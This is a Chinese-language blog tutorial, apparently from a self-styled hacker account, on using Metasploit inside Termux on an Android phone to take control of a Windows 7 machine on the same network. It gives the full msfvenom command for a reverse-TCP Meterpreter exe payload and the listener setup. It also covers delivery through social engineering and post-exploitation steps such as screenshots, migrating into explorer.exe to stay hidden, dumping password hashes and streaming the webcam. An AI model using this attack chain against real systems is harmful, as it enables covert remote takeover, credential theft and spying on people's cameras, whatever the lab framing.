本文仅用于讨论网络安全技术,以保护信息安全为目的,请勿用于非法用途!
测试清单
1、一台已经安装好Termux的安卓手机。
IP是192.168.31.156,也可以输入ifconfig查询!
2、务必保证Termux已经安装好渗透测试框架Metasploit。
没有安装的可以关注作者、获取安装方式,注明来意。
3、win7靶机,不需要知道ip
同一网段(比如都在同一路由器下的wifi环境)
安卓手机不能息屏,也不能退到手机桌面,一直要保持Termux手机终端页面。否则后面的meterpreter会话就会自动断开。
msfvenom
msfvenom是metasploit-framework框架的一个生成载荷的工具。支持众多系统、语言和载荷,我们可以使用这些生成的载荷用于攻击和控制远程的任何电脑(包括安卓手机)。
Termux运行msfvenom
msfvenom
基本options:
-p, --payload <payload> 指定需要使用的payload(攻击荷载)。使用msfvenom -l payload查看所有支持的攻击载荷!/<payload>
-l, --list [module_type] 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all
-f, --format <format> 指定输出格式 。msfvenom -l format查看所有支持的输出格式!/<format>
-h, --help 查看帮助选项
生成有效载荷必须要指定两个必要的选项参数:-p,-f
那生成可执行载荷(本课就是生成一个名为lala.exe的windows文件)有什么用呢?
目的很简单,就是将生成的有效exe载荷发送到目标电脑上(win7靶机),然后运行它。此时Termux中的Metasploit监听端就会受理连接,从而实现控制win7!
使用msfvenom生成有效载荷
Termux终端下执行:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.156 lport=6666 -f exe > lala.exe
注意:Termux生成的payload,windows电脑运行后,无法建立meterpreter会话!实测,只能使用kali系统终端执行该命令。(kali安装请关注作者,获取安装方法!)
然后在kali的终端下输入:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.31.156 lport=6666 -f exe > lala.exe
-p指定有效载荷(exe)使用的攻击载荷、lhost 我们安卓的ip(回连到我们安卓,需要知道一个明确的安卓ip地址)、lport 定义安卓的一个高端口、-f指定输出的格式exe、 >输出符号,最终形成以lala.exe命名的可执行windows程序!(每一个都有一个空格!)
设置Termux监听、部署载荷程序
关于部署:上面创建好的可执行程序lala.exe,你可以将它通过社工等方法(发送、转存、下载)提供到目标电脑上,我们这里仅仅用作教学演示,直接将kali系统生成的lala.exe载荷,拖到win7物理机,切勿用于非法目的!
要想测试实验正常进行,首先你要在Termux上开启metasploit监听!
首先Termux终端下输入命令:
msfconsole
此时就会开启"metasploit"!
然后配置Termux 中的metasploit准备监听载荷回连:
msf> use exploit/multi/handler (1)
set payload windows/meterpreter/reverse_tcp (2)
show options (3)仅仅是显示查看,可以不输入
set lhost 192.168.31.156 (4)
set lport 6666 (5)
run (6)
(1)表示使用一个用于接受远程回连会话的攻击模块;
(2)设置与上面(msfvenom)创建的有效载荷一样的载荷payload;
(3)显示设置参数:执行这个载荷需要设置的参数,一般要设置kali的ip和端口,但要和前面msfvenom设置的ip、端口一样,所以就是设置(4)(5);
(6)就是执行该监听端!
运行如下图:【*】started reverse TCP... 代表我们安卓手机正在监听本地的6666端口,等待win7的载荷程序发回的回连数据!
现在还没有回连,因为我们的lala.exe.载荷还没有发到win7靶机上。
以上就完成了termux的监听,还没受理连接。
通过Termux控制win7靶机
回到电脑端虚拟机kali系统,打开左边菜单栏中的第一个图标,将这个主文件夹中的lala.exe直接拖到win7靶机。
选中kali主文件夹中的lala.exe,拖到win7电脑桌面即可,相当于部署了载荷文件。
当然实际中,你需要他人下载它!
拖拽完毕,kali就不需要再使用了,下面只是win7和安卓手机termux的关系。
假如对方在win7上双击运行了这个lala.exe,我们的Termux就会自动成功受理连接。
我们已经看到termux产生了meterpreter>字样会话,说明已经获得了远程靶机win7电脑的控制权!这个就叫meterpreter会话。
注意:开头讲过,手机必须保证在termux终端页面,不能退出,息屏,断网!如果meterpreter会话died,断开了,请再一次输入run命令执行监听,再次双击win7的lala.exe即可建立连接!
输入"?",即可查看所有可以控制win7电脑的命令。
1、比如,远程桌面获取命令"screenshot"
Meterpreter下输入:
screenshot
成功获取win7的桌面截图,文件保存在/data/data/com.termux/files/home/neynpGgM.jpeg,这个就是图片。
Termux是无法直接查看图片样子的,而且Termux中的文件目录都是Termux私有的,无法通过手机文件管理器直接查看,也无法复制、粘贴到其他设备!
解决办法是:关注小白嘿客、私信回复“Termux文件处理”,即可解决“如何将Termux中的文件、图片上传到电脑端进行查看使用!这里略!”
但是,可以肯定的是,通过screenshot命令获取win7靶机的桌面图片肯定是存在了的!
2、载荷lala.exe进程转移
如果只要对方关闭那个lala.exe,比如在内存服务中关闭了它!那么我们Termux的meterpreter就会断开,所以务必要及时进行远程进程迁移。
Meterpreter下输入:
ps (显示对方电脑的进程列表)
然后找到"explorer.exe"这个程序以及对应的第一个ID号,因为这个explorer.exe是win7电脑的正常运行必须的程序,除非对方电脑关机了,不然这个程序是不会自动关闭,所以我们利用这个特点,将我们的载荷进程迁移到这个explorer.exe的进程ID 3116中。
Termux 的Meterpreter中继续输入:
migrate 3116 (一定是explorer的第一个ID号)
此时即可完成载荷进程迁移!
- 输入"?"命令查看的所有控制命令,这里不再一一讲解,加入作者的《安卓嘿客训练营》,就可学习!
ls:查看远程靶机的文件、upload上传本地手机文件到远程win7;
download:下载远程win7电脑的文件到安卓手机、sysinfo查看远程win7的系统信息;
getsystem:提升termux在远程win7电脑的权限、cd在远程win7上切换目录;
hashdump:下载对方的hash文件;
webcam_stream:获取对方电脑的实时摄像头;
到目前为止,我们已经学会了使用msfvenom来创建可执行的有效载荷exe文件。我们需要提前在Termux端设置好相关的监听,此时只要通过一些方法让目标电脑执行我们的exe文件即可,我们的Termux侦听端就会成功受理会话,控制目标电脑!
安卓嘿客我想说
更多关于
kali渗透、web渗透、安卓渗透等技术,关注作者—小白嘿客,私信获取。欢迎在下方评论区留言讨论!閱讀更多 小白嘿客 的文章
